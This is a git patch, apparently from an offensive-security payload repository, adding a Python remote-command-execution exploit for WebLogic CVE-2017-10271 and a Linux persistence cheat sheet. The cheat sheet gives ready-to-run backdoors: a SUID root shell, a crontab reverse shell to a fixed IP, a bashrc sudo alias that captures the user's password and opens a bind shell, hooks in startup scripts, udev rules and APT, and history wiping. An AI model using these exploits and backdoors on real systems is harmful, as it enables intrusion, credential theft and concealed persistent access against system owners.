From beb0ce8c5439c8b292747e6a12156c5e9f39a41b Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 3 Sep 2018 18:41:05 +0200 Subject: [PATCH] Linux Persistence + WebLogic RCE --- CVE Exploits/WebLogic CVE-2017-10271.py | 61 ++++++++++++ ...2018-2894.py => WebLogic CVE-2018-2894.py} | 0 .../Linux - Persistence.md | 96 +++++++++++++++++++ 3 files changed, 157 insertions(+) create mode 100644 CVE Exploits/WebLogic CVE-2017-10271.py rename CVE Exploits/{Weblogic CVE-2018-2894.py => WebLogic CVE-2018-2894.py} (100%) create mode 100644 Methodology and Resources/Linux - Persistence.md diff --git a/CVE Exploits/WebLogic CVE-2017-10271.py b/CVE Exploits/WebLogic CVE-2017-10271.py new file mode 100644 index 0000000..9990f95 --- /dev/null +++ b/CVE Exploits/WebLogic CVE-2017-10271.py @@ -0,0 +1,61 @@ +import requests +import sys + +url_in = sys.argv[1] +payload_url = url_in + "/wls-wsat/CoordinatorPortType" +payload_header = {'content-type': 'text/xml'} + + +def payload_command (command_in): + html_escape_table = { + "&": "&", + '"': """, + "'": "'", + ">": ">", + "<": "<", + } + command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in)+"" + payload_1 = " \n" \ + " " \ + " \n" \ + " \n" \ + " \n" \ + " " \ + " " \ + " cmd " \ + " " \ + " " \ + " /c " \ + " " \ + " " \ + + command_filtered + \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + "" + return payload_1 + +def do_post(command_in): + result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) + + if result.status_code == 500: + print "Command Executed \n" + else: + print "Something Went Wrong \n" + + + +print "***************************************************** \n" \ + "**************** Coded By 1337g ****************** \n" \ + "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ + "***************************************************** \n" + +while 1: + command_in = raw_input("Eneter your command here: ") + if command_in == "exit" : exit(0) + do_post(command_in) diff --git a/CVE Exploits/Weblogic CVE-2018-2894.py b/CVE Exploits/WebLogic CVE-2018-2894.py similarity index 100% rename from CVE Exploits/Weblogic CVE-2018-2894.py rename to CVE Exploits/WebLogic CVE-2018-2894.py diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md new file mode 100644 index 0000000..235b180 --- /dev/null +++ b/Methodology and Resources/Linux - Persistence.md @@ -0,0 +1,96 @@ +# Linux - Persistence + +## Basic reverse shell + +```bash +ncat --udp -lvp 4242 +ncat --sctp -lvp 4242 +ncat --tcp -lvp 4242 +``` + +## Suid Binary + +```powershell +TMPDIR2="/var/tmp" +echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c +gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null +rm $TMPDIR2/croissant.c +chown root:root $TMPDIR2/croissant +chmod 4777 $TMPDIR2/croissant +``` + +## Crontab (Reverse shell to 192.168.1.2 on port 4242) + +```bash +(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null +``` + +## Backdooring an user's bash_rc (FR/EN Version) + +```bash +TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0" +cat << EOF > /tmp/$TMPNAME2 + alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S ' +EOF +if [ -f ~/.bashrc ]; then + cat /tmp/$TMPNAME2 >> ~/.bashrc +fi +if [ -f ~/.zshrc ]; then + cat /tmp/$TMPNAME2 >> ~/.zshrc +fi +rm /tmp/$TMPNAME2 +``` + + +## Backdooring a startup service + +```bash +RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" +sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart +``` + +## Backdooring a driver + +```bash +echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null +``` + +## Backdooring the APT + +If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};` +Next time "apt-get update" is done, your CMD will be executed! + +```bash +echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor +``` + +## Tips + +Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload. + +```bash +## Do not remove. Generated from /etc/issue.conf by configure. +``` + +Clear the last line of the history. + +```bash +history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null +``` + +The following directories are temporary and usually writeable + +```bash +/var/tmp/ +/tmp/ +/dev/shm/ +``` + + +## Thanks to + +* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289) +* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/) +* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html) +* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/) +* [Pouki from JDI](#no_source_code) \ No newline at end of file